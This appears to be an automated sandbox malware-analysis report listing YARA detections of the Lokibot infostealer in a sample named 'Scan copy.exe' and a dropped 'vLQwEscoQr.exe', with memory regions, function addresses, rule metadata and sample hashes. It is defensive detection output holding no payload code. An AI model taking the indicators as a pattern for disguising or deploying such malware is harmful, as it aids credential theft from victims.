Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1291320333.000000000277C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1291320333.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: Process Memory Space: Scan copy.exe PID: 5420, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: vLQwEscoQr.exe PID: 7512, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: vLQwEscoQr.exe PID: 8048, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_00B443E8	0_2_00B443E8
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_00B4E094	0_2_00B4E094
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_00B4705B	0_2_00B4705B
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_0595F788	0_2_0595F788
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_059541C4	0_2_059541C4
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_05956D31	0_2_05956D31
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_0595F778	0_2_0595F778
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_0595C830	0_2_0595C830
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_0595C840	0_2_0595C840
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_0595CAD8	0_2_0595CAD8
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C88680	0_2_06C88680
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C894C0	0_2_06C894C0
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C894BB	0_2_06C894BB
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C87390	0_2_06C87390
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C86F58	0_2_06C86F58
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C88AB8	0_2_06C88AB8
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Code function: 13_2_02E343E8	13_2_02E343E8
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Code function: 13_2_02E3E094	13_2_02E3E094
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Code function: 13_2_02E37051	13_2_02E37051
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Code function: 13_2_075FF788	13_2_075FF788
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Code function: 13_2_075F41C4	13_2_075F41C4
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Code function: 13_2_075FF778	13_2_075FF778
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Code function: 13_2_075F6D32	13_2_075F6D32
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Code function: 13_2_075FCAD8	13_2_075FCAD8
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Code function: 13_2_075F0040	13_2_075F0040
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Code function: 13_2_075FC840	13_2_075FC840
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Code function: 13_2_075FC830	13_2_075FC830
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Code function: 13_2_07978680	13_2_07978680
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Code function: 13_2_0797F538	13_2_0797F538
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Code function: 13_2_079794B0	13_2_079794B0
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Code function: 13_2_079794C0	13_2_079794C0
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Code function: 13_2_07977390	13_2_07977390
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Code function: 13_2_07976F58	13_2_07976F58
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Code function: 13_2_07978AB8	13_2_07978AB8
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Code function: 20_2_0040549C	20_2_0040549C
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Code function: 20_2_004029D4	20_2_004029D4

Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Code function: String function: 00405B6F appears 42 times

Source: Scan copy.exe, 00000000.00000000.1248317631.00000000003FE000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameYbka.exeF vs Scan copy.exe
Source: Scan copy.exe, 00000000.00000002.1290384680.00000000009FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Scan copy.exe
Source: Scan copy.exe, 00000000.00000002.1297078982.0000000006C90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Scan copy.exe
Source: Scan copy.exe, 00000000.00000002.1295403096.00000000051B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs Scan copy.exe
Source: Scan copy.exe, 00000000.00000002.1291953890.0000000003904000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Scan copy.exe
Source: Scan copy.exe	Binary or memory string: OriginalFilenameYbka.exeF vs Scan copy.exe

Source: Scan copy.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Scan copy.exe.38ea318.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Scan copy.exe.38ea318.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Scan copy.exe.38ea318.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Scan copy.exe.38ea318.2.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Scan copy.exe.38ea318.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Scan copy.exe.3787008.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Scan copy.exe.3787008.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Scan copy.exe.3787008.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Scan copy.exe.3787008.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Scan copy.exe.3787008.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Scan copy.exe.38ea318.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Scan copy.exe.38ea318.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Scan copy.exe.38ea318.2.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Scan copy.exe.38ea318.2.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.vLQwEscoQr.exe.41ec8d8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 20.2.vLQwEscoQr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 20.2.vLQwEscoQr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 20.2.vLQwEscoQr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 20.2.vLQwEscoQr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 20.2.vLQwEscoQr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Scan copy.exe.3787008.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Scan copy.exe.3787008.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Scan copy.exe.3787008.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Scan copy.exe.3787008.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 20.2.vLQwEscoQr.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 20.2.vLQwEscoQr.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 20.2.vLQwEscoQr.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 20.2.vLQwEscoQr.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 20.2.vLQwEscoQr.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.1291320333.000000000277C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
